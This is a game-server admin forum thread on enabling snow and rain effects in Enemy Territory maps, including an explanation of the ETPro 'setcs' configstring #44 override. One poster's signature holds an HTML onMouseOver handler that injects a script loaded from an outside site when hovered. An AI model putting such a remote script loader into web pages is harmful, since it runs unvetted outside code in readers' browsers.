snow?

Discussion for Admins of ETPro/BayonET servers.
If you don't run a server, please don't post here...

Moderators: Forum moderators, developers

nicb903

snow?

Post by nicb903 »

is there a way to turn snow on for a map that doesnt have snow included in it? (ie. goldrush)
thanks
KingJackaL

Post by KingJackaL »

nope.

It's a map-specific thing, toggled by cg_atmosphericeffects. Its inclusion is done by the mapper - it's an effect much like grass ( and you can't 'turn grass on' for say, oasis ). Of course, you could turn these effects on by making your own version of a map, but there's no setting to do it no.
gotenks

Post by gotenks »

iirc it's possible for the server but not for the client
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
Deus

Post by Deus »

You mean like this ?

its slightly connected to this POST
nicb903

Post by nicb903 »

thanks deus...

ok... i have the egg worked out, or so i think (thx2rain4hiscfg:-D) or at least i think i have it worked out...
i just cant figure out how to replicate it. i dont wanna say it aloud, but its gotta do with NOT having something? im beating around the bush so i dont just blurt it out, lol... but who knows, i could be wrong.

[edit: crap i dont got it :-(... more hints on the thread anyone?]
=FF=im2good4u

Post by =FF=im2good4u »

i saw ap icture of a map whi rain inside a room
Rain

Post by Rain »

setcs <n> <string> sets configstring #<n> to <string>
Most of the configstrings and their formats can be seen by poking through the ET SDK. Configstring #44 is an etpro feature that takes a precipitation string (as you'd use in a map, in an "atmosphere" key) to override the level's normal precipitation effects. See the ET map SDK manual for information on the atmospheric effects string format.

Configstring #44 is intended for map developers to tweak precipitation effects without having to recompile the bsp or reload the level, but it can be used if you're feeling silly, as well.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
nicb903

Post by nicb903 »

wow thanks alot rain... did you write all of this? i searched google a couple of times and already about 4 or 5 sites have this copied into thier forums.. thx for the info. could you tell me one more thing? is the "rain on fire" egg real? or do you know how to define the texture to use? i found the snow texture and i could just replace it, but i would rather know if you could define the texture (i would love to use the sun glare texture in the /gfx/misc folder for the snow.... in t=snow, does t mean texture or type or what? thx alot :-D i tried to find the "SDK" but found nothing for it, other than what was on the splash damage site, it said download the sdk from the dl section, but all i found of use was the et_source. is there a list of other config strings as well? thanks alot again -Nic
Deus

Post by Deus »

WET_SOURCE = SDK
sponge

Post by sponge »

I much prefer this personally:

2/3Soul

Post by 2/3Soul »

haha that firestorm is awesome - I wish I wasn't lazy - then I might actually try to work out how to do that :D